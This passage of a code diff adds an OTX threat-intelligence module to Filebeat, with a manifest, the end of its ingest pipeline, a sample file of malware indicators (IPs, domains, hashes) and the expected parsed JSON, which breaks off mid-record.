"ctx?.threatintel?.indicator?.type == 'domain-name'" + +###################### +# Cleanup processors # +###################### +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.otx.type + - threatintel.otx.id + - message + ignore_missing: true + if: ctx?.threatintel?.indicator?.type != null +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/otx/manifest.yml b/x-pack/filebeat/module/threatintel/otx/manifest.yml new file mode 100644 index 000000000000..4c349d40fa0c --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/manifest.yml @@ -0,0 +1,20 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: api_token + - name: ssl + - name: types + - name: lookback_range + default: 2h + - name: url + default: "https://otx.alienvault.com/api/v1/indicators/export" + - name: tags + default: [threatintel-otx, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log new file mode 100644 index 000000000000..cec2590a82bf --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log @@ -0,0 +1,80 @@ +{"indicator":"86.104.194.30","description":null,"title":null,"content":"","type":"IPv4","id":1588938} +{"indicator":"90421f8531f963d81cf54245b72cde80","description":"MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65","title":"Win32:Hoblig-B","content":"","type":"FileHash-MD5","id":9751110} +{"indicator":"ip.anysrc.net","description":null,"title":null,"content":"","type":"hostname","id":16782717} +{"indicator":"107.173.58.176","description":null,"title":null,"content":"","type":"IPv4","id":19901748} +{"indicator":"d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":31612067} +{"indicator":"f8e58af3ffefd4037fef246e93a55dc8","description":"MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09","title":null,"content":"","type":"FileHash-MD5","id":34413770} +{"indicator":"1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":111154034} +{"indicator":"8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":151858953} +{"indicator":"213.252.244.38","description":null,"title":null,"content":"","type":"IPv4","id":311294364} +{"indicator":"c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":406540408} +{"indicator":"0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":565556753} +{"indicator":"aeb08b0651bc8a13dcf5e5f6c0d482f8","description":"MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6","title":null,"content":"","type":"FileHash-MD5","id":565556755} +{"indicator":"6df5e1a017dff52020c7ff6ad92fdd37494e31769e1be242f6b23d1ea2d60140","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":575672549} +{"indicator":"c72fef3835f65cb380f6920b22c3488554d1af6d298562ccee92284f265c9619","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":575672550} +{"indicator":"e711fcd0f182b214c6ec74011a395f4c853068d59eb7c57f90c4a3e1de64434a","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":995160791} +{"indicator":"d3ec8f4a46b21fb189fc3d58f3d87bf9897653ecdf90b7952dcc71f3b4023b4e","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1011989699} +{"indicator":"70447996722e5c04514d20b7a429d162b46546002fb0c87f512b40f16bac99bb","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1011989701} +{"indicator":"29340643ca2e6677c19e1d3bf351d654","description":"MD5 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","title":"Win64:Malware-gen","content":"","type":"FileHash-MD5","id":1472176322} +{"indicator":"86c314bc2dc37ba84f7364acd5108c2b","description":"MD5 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2","title":"Win64:Malware-gen","content":"","type":"FileHash-MD5","id":1472457325} +{"indicator":"cb0c1248d3899358a375888bb4e8f3fe","description":"MD5 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-MD5","id":1472457326} +{"indicator":"d348f536e214a47655af387408b4fca5","description":"MD5 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4","title":"Win64:Malware-gen","content":"","type":"FileHash-MD5","id":1472457327} +{"indicator":"29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413","description":null,"title":"vad_contains_network_strings","content":"","type":"FileHash-SHA256","id":1546012751} +{"indicator":"b105891f90b2a8730bbadf02b5adeccbba539883bf75dec2ff7a5a97625dd222","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1546012939} +{"indicator":"e4db5405ac7ab517d43722e1ca8d653ea4a32802bc8a5410d032275eedc7b7ee","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1546012967} +{"indicator":"465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa","description":null,"title":"Win.Malware.TrickbotSystemInfo-6335590-0","content":"","type":"FileHash-SHA256","id":1564141498} +{"indicator":"5051906d6ed1b2ae9c9a9f070ef73c9be8f591d2e41d144649a0dc96e28d0400","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1564141523} +{"indicator":"14b74cb9be8cad8eb5fa8842d00bb692","description":"MD5 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa","title":"Win.Malware.TrickbotSystemInfo-6335590-0","content":"","type":"FileHash-MD5","id":1564142109} +{"indicator":"a5b59f7d133e354dfc73f40517aab730f322f0ef","description":"SHA1 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa","title":"Win.Malware.TrickbotSystemInfo-6335590-0","content":"","type":"FileHash-SHA1","id":1564142964} +{"indicator":"8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1566067095} +{"indicator":"ff2dcea4963e060a658f4dffbb119529","description":"MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1566999970} +{"indicator":"0d73f1a1c4b2f8723fffc83eb3d00f31","description":"MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413","title":"vad_contains_network_strings","content":"","type":"FileHash-MD5","id":1569290125} +{"indicator":"185.25.50.167","description":null,"title":null,"content":"","type":"IPv4","id":1592876453} +{"indicator":"d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1597058431} +{"indicator":"5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1603343478} +{"indicator":"1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","description":null,"title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA256","id":1606260302} +{"indicator":"3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":1606260304} +{"indicator":"b8e463789a076b16a90d1aae73cea9d3880ac0ead1fd16587b8cd79e37a1a3d8","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1606260305} +{"indicator":"113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":1606260310} +{"indicator":"9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA256","id":1606260311} +{"indicator":"c51024bb119211c335f95e731cfa9a744fcdb645a57d35fb379d01b7dbdd098e","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":1606260316} +{"indicator":"ad20c6fac565f901c82a21b70f9739037eb54818","description":"SHA1 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260341} +{"indicator":"13f11e273f9a4a56557f03821c3bfd591cca6ebc","description":"SHA1 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260344} +{"indicator":"1581fe76e3c96dc33182daafd09c8cf5c17004e0","description":"SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec","title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":1606260353} +{"indicator":"b72e75e9e901a44b655a5cf89cf0eadcaff46037","description":"SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56","title":"Trojan:Win32/Occamy.B","content":"","type":"FileHash-SHA1","id":1606260364} +{"indicator":"maper.info","description":null,"title":null,"content":"","type":"domain","id":1634015726} +{"indicator":"213.252.244.126","description":null,"title":null,"content":"","type":"IPv4","id":1635374317} +{"indicator":"78.129.139.131","description":null,"title":null,"content":"","type":"IPv4","id":1756014820} +{"indicator":"9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543412} +{"indicator":"be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543416} +{"indicator":"3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543440} +{"indicator":"dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543441} +{"indicator":"6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543445} +{"indicator":"26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543456} +{"indicator":"02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d","description":null,"title":"xor_0x20_xord_javascript","content":"","type":"FileHash-SHA256","id":2114543458} +{"indicator":"103.13.67.4","description":null,"title":null,"content":"","type":"IPv4","id":2114754074} +{"indicator":"80.90.87.201","description":null,"title":null,"content":"","type":"IPv4","id":2114754077} +{"indicator":"80.80.163.182","description":null,"title":null,"content":"","type":"IPv4","id":2114754078} +{"indicator":"91.187.114.210","description":null,"title":null,"content":"","type":"IPv4","id":2114754080} +{"indicator":"170.238.117.187","description":null,"title":null,"content":"","type":"IPv4","id":2117062744} +{"indicator":"e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d","description":null,"title":null,"content":"","type":"FileHash-SHA256","id":2117884668} +{"indicator":"103.84.238.3","description":null,"title":null,"content":"","type":"IPv4","id":2119746545} +{"indicator":"179.43.158.171","description":null,"title":null,"content":"","type":"IPv4","id":2129763785} +{"indicator":"198.211.116.199","description":null,"title":null,"content":"","type":"IPv4","id":2136050161} +{"indicator":"203.176.135.102","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2136079568} +{"indicator":"fotmailz.com","description":null,"title":null,"content":"","type":"domain","id":2137741373} +{"indicator":"pori89g5jqo3v8.com","description":null,"title":null,"content":"","type":"domain","id":2137741468} +{"indicator":"sebco.co.ke","description":null,"title":null,"content":"","type":"domain","id":2178708355} +{"indicator":"177.74.232.124","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2180669102} +{"indicator":"chishir.com","description":null,"title":null,"content":"","type":"domain","id":2186034800} +{"indicator":"kostunivo.com","description":null,"title":null,"content":"","type":"domain","id":2186034803} +{"indicator":"mangoclone.com","description":null,"title":null,"content":"","type":"domain","id":2186034805} +{"indicator":"onixcellent.com","description":null,"title":null,"content":"","type":"domain","id":2186034807} +{"indicator":"fc0efd612ad528795472e99cae5944b68b8e26dc","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034891} +{"indicator":"24d4bbc982a6a561f0426a683b9617de1a96a74a","description":null,"title":"Sf:ShellCode-DZ\\ [Trj]","content":"","type":"FileHash-SHA1","id":2186034903} +{"indicator":"fa98074dc18ad7e2d357b5d168c00a91256d87d1","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034912} +{"indicator":"e5dc7c8bfa285b61dda1618f0ade9c256be75d1a","description":null,"title":"Win64:Malware-gen","content":"","type":"FileHash-SHA1","id":2186034924} +{"indicator":"96.9.77.142","description":null,"title":"Trickbot","content":"","type":"IPv4","id":2189036445} +{"indicator":"36.89.106.69","description":null,"title":null,"content":"","type":"IPv4","id":2189036446} +{"indicator":"96.9.73.73","description":null,"title":null,"content":"","type":"IPv4","id":2190596263} +{"indicator":"10ec3571596c30b9993b89f12d29d23c","description":"MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6","title":"xor_0x20_xord_javascript","content":"","type":"FileHash-MD5","id":2192837907} diff --git a/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log-expected.json new file mode 100644 index 000000000000..e49896b9dea7 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/otx/test/otx_sample.ndjson.log-expected.json @@ -0,0 +1,1493 @@ +[ + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "86.104.194.30", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 102, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "90421f8531f963d81cf54245b72cde80", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of a5725af4391d21a232dc6d4ad33d7d915bd190bdac9b1826b73f364dc5c1aa65", + "threatintel.otx.title": "Win32:Hoblig-B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 312, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.type": "unknown", + "threatintel.otx.content": "", + "threatintel.otx.indicator": "ip.anysrc.net" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 419, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "107.173.58.176", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 523, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d8c70ca70fd3555a0828fede6cc1f59e2c320ede80157039b6a2f09c336d5f7a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 688, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "f8e58af3ffefd4037fef246e93a55dc8", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of df9b37477a83189cd4541674e64ce29bf7bf98338ed0d635276660e0c6419d09" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 887, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "1c62f004d0c9b91d3467b1b8106772e667e7e2075470c2ec7982b63573c90c54", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1053, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "8d24a14f2600482d0231396b6350cf21773335ec2f0b8919763317fdab78baae", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1234, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "213.252.244.38", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1339, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "c758ec922b173820374e552c2f015ac53cc5d9f99cc92080e608652aaa63695b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1505, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1671, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "aeb08b0651bc8a13dcf5e5f6c0d482f8", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 0df586aa0334dcbe047d24ce859d00e537fdb5e0ca41886dab27479b6fc61ba6" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 1871, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "6df5e1a017dff52020c7ff6ad92fdd37494e31769e1be242f6b23d1ea2d60140", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2037, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "c72fef3835f65cb380f6920b22c3488554d1af6d298562ccee92284f265c9619", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2203, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e711fcd0f182b214c6ec74011a395f4c853068d59eb7c57f90c4a3e1de64434a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2369, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d3ec8f4a46b21fb189fc3d58f3d87bf9897653ecdf90b7952dcc71f3b4023b4e", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2536, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "70447996722e5c04514d20b7a429d162b46546002fb0c87f512b40f16bac99bb", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2703, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "29340643ca2e6677c19e1d3bf351d654", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2919, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "86c314bc2dc37ba84f7364acd5108c2b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3135, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "cb0c1248d3899358a375888bb4e8f3fe", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56", + "threatintel.otx.title": "Trojan:Win32/Occamy.B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3355, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "d348f536e214a47655af387408b4fca5", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3571, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "vad_contains_network_strings" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3764, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "b105891f90b2a8730bbadf02b5adeccbba539883bf75dec2ff7a5a97625dd222", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3931, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e4db5405ac7ab517d43722e1ca8d653ea4a32802bc8a5410d032275eedc7b7ee", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4098, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win.Malware.TrickbotSystemInfo-6335590-0" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4303, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "5051906d6ed1b2ae9c9a9f070ef73c9be8f591d2e41d144649a0dc96e28d0400", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4470, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "14b74cb9be8cad8eb5fa8842d00bb692", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa", + "threatintel.otx.title": "Win.Malware.TrickbotSystemInfo-6335590-0" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4709, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "a5b59f7d133e354dfc73f40517aab730f322f0ef", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa", + "threatintel.otx.title": "Win.Malware.TrickbotSystemInfo-6335590-0" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4958, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5125, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "ff2dcea4963e060a658f4dffbb119529", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b", + "threatintel.otx.title": "vad_contains_network_strings" + }, + { + "event.category": "threat", + 